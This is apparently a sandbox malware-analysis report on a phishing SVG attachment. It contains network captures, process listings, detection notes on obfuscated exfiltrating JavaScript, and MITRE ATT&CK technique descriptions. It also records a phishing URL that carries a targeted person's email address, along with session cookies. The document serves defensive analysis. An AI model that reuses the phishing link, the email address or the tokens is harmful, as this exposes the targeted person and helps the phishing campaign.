6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f Data Ascii: pOOFpOOFpOOFpO++oOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOO
2025-03-24 06:19:30 UTC	1369	IN	Data Raw: 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b Data Ascii: O++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.24	60836	151.101.194.137	443	3600	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 06:19:31 UTC	665	OUT	GET /jquery-3.6.0.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Referer: https://mo.zonqdkqezktw.es/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 06:19:31 UTC	564	IN	HTTP/1.1 200 OK Connection: close Content-Length: 89501 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-15d9d" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Accept-Ranges: bytes Date: Mon, 24 Mar 2025 06:19:31 GMT Via: 1.1 varnish Age: 1466154 X-Served-By: cache-lga21950-LGA X-Cache: HIT X-Cache-Hits: 582 X-Timer: S1742797172.950762,VS0,VE0 Vary: Accept-Encoding
2025-03-24 06:19:32 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 Data Ascii: /! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
2025-03-24 06:19:32 UTC	16384	IN	Data Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]\|\|(a[S]={}))[a.uniqueID]\|\|(o[a.uniqueID]={}))[h]\|\|[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]\|\|(d=s=0)\|\|u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]\|\|(a[S]={}))[a.uniqueID]\|
2025-03-24 06:19:32 UTC	16384	IN	Data Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType\|\|9===e.nodeType\|\|!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t\|\|(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
2025-03-24 06:19:32 UTC	16384	IN	Data Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65 Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
2025-03-24 06:19:32 UTC	16384	IN	Data Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)\|\|(i=S.attrHooks[t.toLowerCase()]\|\|(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
2025-03-24 06:19:32 UTC	7581	IN	Data Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52 Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain\|\|e["X-Requested-With"]\|\|(e["X-R

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.24	60835	104.21.80.1	443	3600	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 06:19:32 UTC	1351	OUT	GET /favicon.ico HTTP/1.1 Host: mo.zonqdkqezktw.es Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://mo.zonqdkqezktw.es/8VVgl7/$christo@draftworx.com Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: XSRF-TOKEN=eyJpdiI6InB6Y2JUNkJ5NXBpYlFQQmdoQ1dIVnc9PSIsInZhbHVlIjoidTJEblVVM1dlbHplTlhLcHQrM0JDK2FiaFQ2YVhMOVhMTzYzczZiSVJzN2IzOWRHQStoWmZOOUNFNHFQL2JIYjE2MGFJY09CWTVjbE1tM2hMemttMzdTdENLODNBU2RZdVQ0MklRT1ZUcXdheG1NeEFPcGx2Z2k1bG40YzFTTnMiLCJtYWMiOiJkNjlhODY5NWI2OTZhMTMzYmY5NTA2NmZhY2M0MjNkYTAzYjRlZTJjYzQwZTQ0MmFkZTc2ZmQ0NjI1YmU0YWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjBMMWhLN1c0Nyt4aDlPMlgvU3pwWUE9PSIsInZhbHVlIjoiWmhRcUY0MFRLRTVvSVNXMVM1UDZ4Nmx4dDJIWGhXaFlRNjUxOFZHeUFqV0dUdDRPcmZZdDZ6eEN4aHRLLzlEaXdiNGEyY3R2Rk1BYXluSWdSU1VvOW94alNUek5mV0t0ZmovUlkxaHFNbFp4am1lVUNsa0FrSHhzeUxrNVZCUDIiLCJtYWMiOiI5OWIxYmNhZDIxZjJiNDU3NjFlMDYyMzFmZjUzMzM1MjM0ZGJkMTA4YzY4MGVkZTI3N2M5YTAzYTRjOTNmMTFjIiwidGFnIjoiIn0%3D
2025-03-24 06:19:32 UTC	1060	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Mar 2025 06:19:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close cf-cache-status: MISS Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uun%2BxGZQ51yblYIFmruPNj8lKOgKuUQ5kLkzGqYNzI7xHwz6eih1ATQCYenedh2K7ZGTGxTzpGIxxCS2TGeRcIcH6L4%2B%2BjEMFU8%2BmhE0R4MqrPmzHy5XqIam0XAFvjSyhJaX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding server-timing: cfL4;desc="?proto=TCP&rtt=334&min_rtt=316&rtt_var=124&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2820&recv_bytes=2266&delivery_rate=9026785&cwnd=252&unsent_bytes=0&cid=f1e1fc67d8a9b90e&ts=167&x=0" Cache-Control: max-age=14400 Server: cloudflare CF-RAY: 92540eb6fafa2142-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=98686&min_rtt=97536&rtt_var=21740&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1923&delivery_rate=38157&cwnd=249&unsent_bytes=0&cid=0740d767012a2c32&ts=2107&x=0"
2025-03-24 06:19:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.24	60839	35.190.80.1	443	3600	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 06:19:32 UTC	545	OUT	OPTIONS /report/v4?s=Uun%2BxGZQ51yblYIFmruPNj8lKOgKuUQ5kLkzGqYNzI7xHwz6eih1ATQCYenedh2K7ZGTGxTzpGIxxCS2TGeRcIcH6L4%2B%2BjEMFU8%2BmhE0R4MqrPmzHy5XqIam0XAFvjSyhJaX HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://mo.zonqdkqezktw.es Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 06:19:33 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: OPTIONS, POST access-control-allow-origin: * access-control-allow-headers: content-length, content-type date: Mon, 24 Mar 2025 06:19:32 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.24	60840	35.190.80.1	443	3600	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 06:19:33 UTC	520	OUT	POST /report/v4?s=Uun%2BxGZQ51yblYIFmruPNj8lKOgKuUQ5kLkzGqYNzI7xHwz6eih1ATQCYenedh2K7ZGTGxTzpGIxxCS2TGeRcIcH6L4%2B%2BjEMFU8%2BmhE0R4MqrPmzHy5XqIam0XAFvjSyhJaX HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 453 Content-Type: application/reports+json Origin: https://mo.zonqdkqezktw.es User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 06:19:33 UTC	453	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 31 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 2e 7a 6f 6e 71 64 6b 71 65 7a 6b 74 77 2e 65 73 2f 38 56 56 67 6c 37 2f 24 63 68 72 69 73 74 6f 40 64 72 61 66 74 77 6f 72 78 2e 63 6f 6d 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 38 30 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c Data Ascii: [{"age":0,"body":{"elapsed_time":311,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://mo.zonqdkqezktw.es/8VVgl7/$christo@draftworx.com","sampling_fraction":1.0,"server_ip":"104.21.80.1","status_code":404,"type":"http.error"},
2025-03-24 06:19:33 UTC	214	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-allow-origin: * vary: Origin date: Mon, 24 Mar 2025 06:19:33 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Statistics

CPU Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Memory Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Click to jump to process

Target ID:	0
Start time:	02:19:21
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff6ecfc0000
File size:	3'384'928 bytes
MD5 hash:	DBE43C1D0092437B88CFF7BD9ABC336C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	02:19:22
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1908,i,12973504313424572238,13237224200463066613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=1748 /prefetch:11
Imagebase:	0x7ff6ecfc0000
File size:	3'384'928 bytes
MD5 hash:	DBE43C1D0092437B88CFF7BD9ABC336C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	02:19:29
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg"
Imagebase:	0x7ff6ecfc0000
File size:	3'384'928 bytes
MD5 hash:	DBE43C1D0092437B88CFF7BD9ABC336C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Source: 1.2..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://mo.zonqdkqezktw.es/8VVgl7/$christo@draftwo... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` to decode base64-encoded strings, followed by `eval()` to execute the decoded content, poses a significant security risk. Additionally, the script appears to be sending user data to an untrusted domain, which is a clear indicator of malicious intent. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
Source: 1.7..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://mo.zonqdkqezktw.es/8VVgl7/$christo@draftwo... This script demonstrates high-risk behaviors, including dynamic code execution through the use of a Proxy object that evaluates decoded strings. The obfuscated nature of the code and the potential for remote code execution make this a high-risk script.

Source: https://mo.zonqdkqezktw.es/8VVgl7/$christo@draftworx.com	HTTP Parser: No favicon
Source: https://mo.zonqdkqezktw.es/8VVgl7/$christo@draftworx.com	HTTP Parser: No favicon

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Source: Yara match	File source: 1.3.d.script.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML
Source: Yara match	File source: 1.0.pages.csv, type: HTML

Source: Yara match	File source: FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg, type: SAMPLE
Source: Yara match	File source: 0.0..script.csv, type: HTML
Source: Yara match	File source: 1.3.d.script.csv, type: HTML
Source: Yara match	File source: 1.7..script.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML
Source: Yara match	File source: 1.0.pages.csv, type: HTML

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 47

